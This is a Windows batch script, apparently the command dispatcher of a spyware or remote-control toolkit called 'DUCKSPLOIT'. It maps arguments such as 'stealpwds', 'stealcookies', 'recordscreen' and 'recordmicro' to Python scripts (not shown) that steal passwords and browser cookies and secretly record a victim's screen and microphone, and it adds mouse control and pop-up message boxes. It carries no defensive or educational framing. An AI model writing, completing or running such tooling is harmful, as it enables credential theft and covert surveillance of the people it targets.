@echo off

cls

cd \
cd Users\%username%\DUCKSPLOIT

color A

FOR /F "tokens=*" %%i IN (helpcommand.txt) DO if %1==help (echo %%i)





if %1==createfile ((echo %text%)>"text.txt"&&echo successfully written file!)

if %1==stealpwds (python log.py && (echo %2)> action.txt)
if %1==stealcookies (python cookies.py && (echo %2)> action.txt)

if %1==recordscreen (python screen_recorder.py && (echo %2)> action.txt)
if %1==recordmicro (python micro_recorder.py && (echo %2)> action.txt)

if %1==mouseclick (python mouseclick.py && (echo %2)> action.txt)
if %1==mousescroll (python mousescroll.py && (echo %2)> action.txt)
if %1==mousemove (python mousemove.py %2 %3)
if %1==locatemouse (python locatemouse.py)




SET title=%3
SET line1=%4
SET line2=%5


if %1==msg (if %2==-file (FOR /F "tokens=*" %%f IN (text.txt) DO SET file=%%f &&(echo MsgBox "%file%" ^& vbCrLf ^& "%line2%" ,16, "%title%")> File.vbs && start File.vbs) else (echo MsgBox "%line1%" ^& vbCrLf ^& "%line2%" ,16, "%title%")> File.vbs && start File.vbs)